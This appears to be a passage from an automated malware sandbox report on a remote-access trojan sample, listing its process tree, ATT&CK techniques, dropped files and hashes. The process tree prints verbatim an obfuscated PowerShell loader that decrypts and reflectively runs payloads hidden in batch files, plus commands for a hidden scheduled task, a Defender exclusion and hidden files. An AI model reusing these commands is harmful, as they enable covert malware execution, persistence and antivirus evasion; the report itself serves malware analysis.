    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X7Zhl6Khi2ZbZn4/PrAf+8sGbyoXniPMQQRnCuRZwU4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FTiKRMGfSm1nLSyYBeX8aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWgzw=New-Object System.IO.MemoryStream(,$param_var); $qruKH=New-Object System.IO.MemoryStream; $RPpcy=New-Object System.IO.Compression.GZipStream($VWgzw, [IO.Compression.CompressionMode]::Decompress); $RPpcy.CopyTo($qruKH); $RPpcy.Dispose(); $VWgzw.Dispose(); $qruKH.Dispose(); $qruKH.ToArray();}function execute_function($param_var,$param2_var){ $kflaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sDziU=$kflaA.EntryPoint; $sDziU.Invoke($null, $param2_var);}$gEOgE = 'C:\Users\Admin\AppData\Local\Temp\invoicer.bat';$host.UI.RawUI.WindowTitle = $gEOgE;$nkdNJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gEOgE).Split([Environment]::NewLine);foreach ($inqUq in $nkdNJ) { if ($inqUq.StartsWith(':: ')) { $KTGgd=$inqUq.Substring(3); break; }}$payloads_var=[string[]]$KTGgd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2652
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_85_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_85.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5088
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_85.vbs"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:800
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_85.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:976
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X7Zhl6Khi2ZbZn4/PrAf+8sGbyoXniPMQQRnCuRZwU4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FTiKRMGfSm1nLSyYBeX8aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWgzw=New-Object System.IO.MemoryStream(,$param_var); $qruKH=New-Object System.IO.MemoryStream; $RPpcy=New-Object System.IO.Compression.GZipStream($VWgzw, [IO.Compression.CompressionMode]::Decompress); $RPpcy.CopyTo($qruKH); $RPpcy.Dispose(); $VWgzw.Dispose(); $qruKH.Dispose(); $qruKH.ToArray();}function execute_function($param_var,$param2_var){ $kflaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sDziU=$kflaA.EntryPoint; $sDziU.Invoke($null, $param2_var);}$gEOgE = 'C:\Users\Admin\AppData\Roaming\startup_str_85.bat';$host.UI.RawUI.WindowTitle = $gEOgE;$nkdNJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gEOgE).Split([Environment]::NewLine);foreach ($inqUq in $nkdNJ) { if ($inqUq.StartsWith(':: ')) { $KTGgd=$inqUq.Substring(3); break; }}$payloads_var=[string[]]$KTGgd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:2956
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4552
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PMom9RnlfWzjG8MC5lXaac8aBGu+w5gW8NmRz9Kk+g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3K43OSBcYlntcFGSbtNow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YujPS=New-Object System.IO.MemoryStream(,$param_var); $WQOly=New-Object System.IO.MemoryStream; $xgIaW=New-Object System.IO.Compression.GZipStream($YujPS, [IO.Compression.CompressionMode]::Decompress); $xgIaW.CopyTo($WQOly); $xgIaW.Dispose(); $YujPS.Dispose(); $WQOly.Dispose(); $WQOly.ToArray();}function execute_function($param_var,$param2_var){ $zVSXB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RyFSy=$zVSXB.EntryPoint; $RyFSy.Invoke($null, $param2_var);}$tIIDK = 'C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat';$host.UI.RawUI.WindowTitle = $tIIDK;$KlFzN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tIIDK).Split([Environment]::NewLine);foreach ($XYyBu in $KlFzN) { if ($XYyBu.StartsWith(':: ')) { $JQyvV=$XYyBu.Substring(3); break; }}$payloads_var=[string[]]$JQyvV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3976
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_531_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_531.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2476
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_531.vbs"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:3028
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_531.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4864
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PMom9RnlfWzjG8MC5lXaac8aBGu+w5gW8NmRz9Kk+g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3K43OSBcYlntcFGSbtNow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YujPS=New-Object System.IO.MemoryStream(,$param_var); $WQOly=New-Object System.IO.MemoryStream; $xgIaW=New-Object System.IO.Compression.GZipStream($YujPS, [IO.Compression.CompressionMode]::Decompress); $xgIaW.CopyTo($WQOly); $xgIaW.Dispose(); $YujPS.Dispose(); $WQOly.Dispose(); $WQOly.ToArray();}function execute_function($param_var,$param2_var){ $zVSXB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RyFSy=$zVSXB.EntryPoint; $RyFSy.Invoke($null, $param2_var);}$tIIDK = 'C:\Users\Admin\AppData\Roaming\startup_str_531.bat';$host.UI.RawUI.WindowTitle = $tIIDK;$KlFzN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tIIDK).Split([Environment]::NewLine);foreach ($XYyBu in $KlFzN) { if ($XYyBu.StartsWith(':: ')) { $JQyvV=$XYyBu.Substring(3); break; }}$payloads_var=[string[]]$JQyvV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        6⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3548
        
        C:\Windows\System32\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\system"
        7⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:4084
        
        C:\Windows\System32\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\system\system.exe"
        7⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:4992
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpFA1F.tmp.bat""
        7⤵
        
        PID:4764
        
        C:\Windows\system32\timeout.exe
        
        timeout 3
        8⤵
        Delays execution with timeout.exe
        
        PID:4752
        
        C:\Users\Admin\system\system.exe
        
        "C:\Users\Admin\system\system.exe"
        8⤵
        Executes dropped EXE
        
        PID:1548

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\S500RAT.exe.log

Filesize
42B

MD5
84cfdb4b995b1dbf543b26b86c863adc

SHA1
d2f47764908bf30036cf8248b9ff5541e2711fa2

SHA256
d8988d672d6915b46946b28c06ad8066c50041f6152a91d37ffa5cf129cc146b

SHA512
485f0ed45e13f00a93762cbf15b4b8f996553baa021152fae5aba051e3736bcd3ca8f4328f0e6d9e3e1f910c96c4a9ae055331123ee08e3c2ce3a99ac2e177ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
f3c09cd778e1a0b1fdd6cbc74036bf4b

SHA1
20c86d7a83204e7a99c3c99acf79f891961e9b5e

SHA256
5b74d916934b7c3a1c0ad0c2716827f7a8fbf5722e9cc5a12a74e0e8834e5e25

SHA512
fe58e5014c7a5753b204f8e22f5e708642d8aa5e22c0b7b4107d4c8dc95d6ad1f3cbbe2ec823140f2a310437c10c2ea8d8ffb1a191520040f7824c121642fb9c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
bceed48e720d53a41dfa3c7c73f23f0f

SHA1
d06284e9e184a924efb235e8abc8ec19348b8c2d

SHA256
2a94a7e6d5247e4f03a36f6c9cd1e24c394bdbcdf46b9a866ad7823d0483d019

SHA512
402a0006b17a603c3a8c6ebc566579d1fe1a27e5d834ebe3cb1420d09d829ef261de2b4e62b6fce3624e93fe42dbfa21d4bb7063469c480ae4d9c5568d5df31f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b70bb42b5f053a986ba1a544817bf722

SHA1
c26f5c74ae56f37efbe7ce61a1a15bd5cc215f13

SHA256
b15e56fef36d411e28adfaf6914511300756706527fcfa65598177f5f6a0299b

SHA512
1ce6c9261bdc04cab0264689da6a70e3943d7b7db0adb375cf7cfc71ff8505127047f0b9b52ed6e707b6bf388baeafe735955aa4e4ccf231085ff91de2605292

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
dbbf71e9fb59f80938f09809b160e441

SHA1
8b9a517d846cb9a0a284f77ed88328236a85055f

SHA256
e1de59d46c7c47af2d62f7754524b080a706be6b38d55a03733a10c3675598b1

SHA512
90b75d43ddb81c710fb8fe2fd15b5c05181c774d3f401e47862006adb1703bc65ad8fead4aaf7a28b8e2bbe7249f3de998bd9432c1e62fa8718a19dacc4b8840

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1cc5e033811a5d520bb4a6904b5c433b

SHA1
c159a342ed372790600b3a6ac97e274638a0ce9a

SHA256
9e20052dd29dfcd8220dcf271acd3e27f9d6b785d72531043741ef349b48c7a8

SHA512
dd8b57e50382a7a84aea3986c3ae8a38ade0fb84a5c9696339487022321be12f08aff9d47455a28137e31a8632cda2490dcf0332c6b3c72e7cfdd10e63e4f429

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
eb1ad317bd25b55b2bbdce8a28a74a94

SHA1
98a3978be4d10d62e7411946474579ee5bdc5ea6

SHA256
9e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98

SHA512
d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9c740b7699e2363ac4ecdf496520ca35

SHA1
aa8691a8c56500d82c5fc8c35209bc6fe50ab1d9

SHA256
be96c91b62ba9ba7072ab89e66543328c9e4395150f9dbe8067332d94a3ecc61

SHA512
8885683f96353582eb871209e766e7eba1a72a2837ce27ea298b7b5b169621d1fa3fce25346b6bfd258b52642644234da9559d4e765a2023a5a5fc1f544cc7af

Download Submit
C:\Users\Admin\AppData\Local\Temp\S500RAT.exe

Filesize
18.8MB

MD5
017ab96e80048ff5c16c045f0b07dd5c

SHA1
81d29230438596bc35d5c20a3c5077c6f6bf286a

SHA256
baf65c88b4d48cb3701f9dc503f9800e06b490e169c8f3668f250052c703ee62

SHA512
8a2fb18187f6432a4c266de6dbda7b98d1838838a73dc9a593d2f814336d5842ea3ce101a60714aabc735390560b6c61e66166c0a643646c7e5aa994c59f2987

Download Submit
C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat

Filesize
262KB

MD5
ad0c8112fc6de16730b2c05452bd5a5d

SHA1
de5c18c8b52136d3f36eb309d2cab5a94217b80f

SHA256
3ca4327561a8b88204b8716306fccf8815ba3ea515d5f213c810355fa66d19c7

SHA512
5d854c0cb895c989d06b49b7004ef2747dbbd3225f066cd84792e9c99238f03cd63b3943729a7853b00b49492d5ab0525b37999a97f23a46ce1486ede770f780

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rucuygmh.prx.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\invoicer.bat

Filesize
284KB

MD5
f4d1ac2353407590dd8f02cac6b2104a

SHA1
9681117cd8ea67bc8b3907004e9ce808ca0187ec

SHA256
3c7c299737de3ff60f8c30f000c0a9f3454396acc1dce473e1e1a2696bbc67b7

SHA512
7d4e6dbf7ea33a5a020df56e001928ef8b387b8d7eae8d26f5f591790553ab102a7186cd39ef937ab895976b504ae4a2540b7f2405a7d2ab81fbb87575da2082

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpFA1F.tmp.bat

Filesize
141B

MD5
943ea75773f7b07665995c9574d530ba

SHA1
558bf7e899d3543ed3d8ae04062dbcc020fc8a5e

SHA256
e33ff924968f97c4f2293bec3faf01c781b296acee6a3316218fa3dddb356714

SHA512
8a58aaa2528e96e66afa281868cd1c1887de5eb8eb034f961c7c27c07217312509e07a797020d5c155dd26512fb2db602cdde54362014efcc9ec3c418e56cd81

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_166.vbs

Filesize
115B

MD5
368b9ef45437db3c8d74b131165dac4a

SHA1
08814e207c36f531b3e3efe6eed7c7f45d3ea90e

SHA256
983ace1ff7d7220f5bb2dea998f4f603f7869e013e25f9329af6ba02d58b3681

SHA512
1879ec6fad3e5ee3a4e3aefd7edc0cddfb1ab8a4cc5aa8e60fe7ab8d76abaa6e60fc0af9b1477abb9c519b0bb8f4d3f8ee07f925bb2ba1dd7d5692a605223c5b

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_531.vbs

Filesize
115B

MD5
d8b0aa12a851fd960ac47498fa371da2

SHA1
bab8853105e1e56530d338ceac9ca92fcce018b0

SHA256
6cd22a5a0f25e981fe813327be8bd748128c6b4f040da666cb7446139c7f61f8

SHA512
bf5c7931971d4d3c4042da1452d4107481766a65d8a4d334d4b522063a498ca0f8e3185760854309610a53d855c517b2557110b858a409128ab9b2dcb04d51c8

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_58.vbs

Filesize
114B

MD5
83a11e2dd07ab08994530007211b737b

SHA1
fd062ce0480df511b63c0bbadabb8b5da64e81e2

SHA256
33972f8ea009e89bdd302035e3e949ca3b8db4bb7fd733b2f62a16e52742575c

SHA512
86af9e36b608b5f1ee4af5e4f5ea700f0223c4e812d650457d6e72ad712057440c5aac89f45009914224961b01fb0459fdb04cf8c0aa6cc2857dc79828cbd27a

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_85.vbs

Filesize
114B

MD5
01240672968c73d837a0cf158ca84d95

SHA1
008a4ab9d5d9ad02148e129ee8dc58242764a095

SHA256
ef753dbe92d4d8769f52b0d564081675185bb435dbf6c1cc68d35e6935346534

SHA512
b45d5c92d0d61a318bb37955b9a68d740c363768a69c42884dafc645b7e73a79fff8168a79ebc9a5ed02dd3f3277b7f4815e425cfd6544c612f5e27c26a5860f

Download Submit
C:\Users\Admin\system\system.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
memory/1548-264-0x000001BE35F10000-0x000001BE35F54000-memory.dmp

Filesize
272KB

Download
memory/1548-265-0x000001BE36380000-0x000001BE363F6000-memory.dmp

Filesize
472KB

Download
memory/2652-102-0x000002266FD90000-0x000002266FDC8000-memory.dmp

Filesize
224KB

Download
memory/2652-88-0x000002266D910000-0x000002266D918000-memory.dmp

Filesize
32KB

Download
memory/2956-223-0x00000198D7B30000-0x00000198D7B46000-memory.dmp

Filesize
88KB

Download
memory/3380-0-0x00007FF99E1E3000-0x00007FF99E1E5000-memory.dmp

Filesize
8KB

Download
memory/3380-72-0x00007FF99E1E0000-0x00007FF99ECA1000-memory.dmp

Filesize
10.8MB

Download
memory/3380-2-0x00007FF99E1E0000-0x00007FF99ECA1000-memory.dmp

Filesize
10.8MB

Download
memory/3380-1-0x0000000000840000-0x0000000001B70000-memory.dmp

Filesize
19.2MB

Download
memory/3548-205-0x000001BFF9C20000-0x000001BFF9C2E000-memory.dmp

Filesize
56KB

Download
memory/3976-99-0x0000020640C30000-0x0000020640C38000-memory.dmp

Filesize
32KB

Download
memory/3976-101-0x0000020640C60000-0x0000020640C94000-memory.dmp

Filesize
208KB

Download
memory/4116-31-0x00007FF99E1E0000-0x00007FF99ECA1000-memory.dmp

Filesize
10.8MB

Download
memory/4116-28-0x00007FF99E1E0000-0x00007FF99ECA1000-memory.dmp

Filesize
10.8MB

Download
memory/4116-27-0x00007FF99E1E0000-0x00007FF99ECA1000-memory.dmp

Filesize
10.8MB

Download
memory/4116-17-0x00007FF99E1E0000-0x00007FF99ECA1000-memory.dmp

Filesize
10.8MB

Download
memory/4116-16-0x000001FF37A60000-0x000001FF37A82000-memory.dmp

Filesize
136KB

Download
memory/4300-109-0x00007FF99E1E0000-0x00007FF99ECA1000-memory.dmp

Filesize
10.8MB

Download
memory/4300-15-0x00000000001E0000-0x00000000014AA000-memory.dmp

Filesize
18.8MB

Download
memory/4300-14-0x00007FF99E1E0000-0x00007FF99ECA1000-memory.dmp

Filesize
10.8MB

Download